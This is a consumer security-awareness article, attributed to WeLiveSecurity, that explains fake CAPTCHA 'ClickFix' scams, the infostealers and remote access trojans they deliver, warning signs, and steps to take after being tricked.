Fake CAPTCHA Scams: ClickFix Malware and How to Avoid

Cybercriminals are weaponizing fake human-verification pages. These rogue CAPTCHAs—often tied to the ClickFix social engineering technique—trick you into running commands that silently download malware via trusted Windows tools.

What’s driving the surge

• Bots now account for more than half of internet traffic, and nearly two-fifths are malicious.
• People trust CAPTCHA challenges and click quickly to reach content.
• Multi-step verification feels normal, so unusual prompts raise fewer red flags.
• Attackers hide behind legitimate Windows utilities (e.g., PowerShell, mshta.exe) to evade detection.

Where you’ll encounter fake CAPTCHAs

• Phishing emails, texts, and social media messages—now more convincing thanks to generative AI and multilingual lures.
• Legitimate websites booby-trapped with malicious ads or injected content (malvertising), sometimes requiring minimal interaction before the fake CAPTCHA appears.

How the scam unfolds

• A page resembling reCAPTCHA appears and instructs you to do things real CAPTCHAs don’t:
  • Click repeatedly to “verify you’re human.”
  • Press Windows key + R to open the Run dialog.
  • Paste a command (silently copied to your clipboard) and press Enter.
• That command calls trusted Windows tools (like PowerShell or mshta.exe) to fetch additional payloads from attacker servers.

What gets installed

• Infostealers: They harvest logins, cookies, emails, crypto wallets, screenshots, keystrokes, and more. In 2024, at least 23 million victims—mostly on Windows—lost over two billion credentials. Lumma Stealer alone compromised up to 10 million devices before a global disruption effort that included ESET.
• Remote access trojans (RATs): Tools like AsyncRAT (seen in about 4% of incidents in 2024) give attackers remote control for data theft and keylogging.
• Other threats: Ransomware, cryptominers, and even nation-state-aligned malware.

Red flags to spot a rogue CAPTCHA

• Any “verification” that asks you to open Run (Win+R), paste commands, or execute scripts.
• CAPTCHA prompts appearing out of context, on unrelated pages, or repeatedly.
• Pressure to click through multiple times without a clear purpose.

How to stay safe

• Keep your operating system and browser up to date.
• Use reputable, up-to-date security software.
• Avoid pirated software (a common malware delivery channel).
• Consider an ad blocker to reduce exposure to malvertising.
• Slow down and scrutinize any unexpected verification steps.

If you already clicked

• Disconnect from the internet and back up important files.
• Run a full malware scan with trusted security software.
• Perform a factory reset or clean reinstall if necessary.
• Change all passwords; use strong, unique credentials stored in a password manager.
• Enable multi-factor authentication (MFA) on all accounts.

Bottom line
Fake CAPTCHA pages are a fast-growing malware delivery vector. Treat any verification that asks you to run commands as a major red flag, and act quickly if you slip up.

Source: WeLiveSecurity